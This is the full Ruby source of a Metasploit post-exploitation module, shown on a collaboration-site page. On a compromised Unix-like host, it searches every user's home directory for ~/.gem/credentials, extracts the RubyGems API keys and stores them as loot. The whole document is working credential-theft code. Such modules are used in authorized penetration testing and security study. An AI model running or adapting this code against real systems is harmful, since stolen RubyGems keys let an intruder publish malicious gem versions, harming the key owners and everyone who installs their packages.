Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Unix
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Multi Gather RubyGems API Key',
15
        'Description' => %q{
16
          This module obtains a user's RubyGems API key from ~/.gem/credentials.
17
        },
18
        'Author' => [
19
          'Jonathan Claudius <jclaudius[at]trustwave.com>',
20
          'Brandon Myers <bmyers[at]trustwave.com>'
21
        ],
22
        'Platform' => %w[bsd linux osx unix],
23
        'SessionTypes' => %w[shell],
24
        'License' => MSF_LICENSE
25
      )
26
    )
27
  end
28

29
  def run
30
    print_status('Finding ~/.gem/credentials')
31
    paths = enum_user_directories.map { |d| d + '/.gem/credentials' }
32
    paths = paths.select { |f| file?(f) }
33

34
    if paths.empty?
35
      print_error('No users found with a ~/.gem/credentials file')
36
      return
37
    end
38

39
    download_key(paths)
40
  end
41

42
  # Ruby gem credentials are pretty standard and can come
43
  # in a few flavors, but the most common are straight yaml
44
  # and json, both of which are colon delimited. I suppose
45
  # you could concievably have more than one, but that'd be
46
  # manually editing, and the first one is probably the best
47
  # one anyway.
48
  def extract_key(path)
49
    data = read_file(path)
50
    keys = data.split(':').select { |k| k =~ /[0-9a-f]{32}/ }
51
    keys.map(&:strip).first
52
  end
53

54
  def download_key(paths)
55
    print_status("Looting #{paths.count} files")
56
    paths.each do |path|
57
      path.chomp!
58
      next if ['.', '..'].include?(path)
59

60
      rubygems_api_key = extract_key(path)
61
      next unless rubygems_api_key
62

63
      print_good("Found a RubyGems API key: #{rubygems_api_key}")
64

65
      loot_path = store_loot(
66
        'rubygems.apikey',
67
        'text/plain',
68
        session,
69
        rubygems_api_key,
70
        'rubygems_api_key.txt',
71
        'RubyGems API key'
72
      )
73

74
      print_good("RubyGems API key stored in #{loot_path}")
75
    end
76
  end
77
end
78

79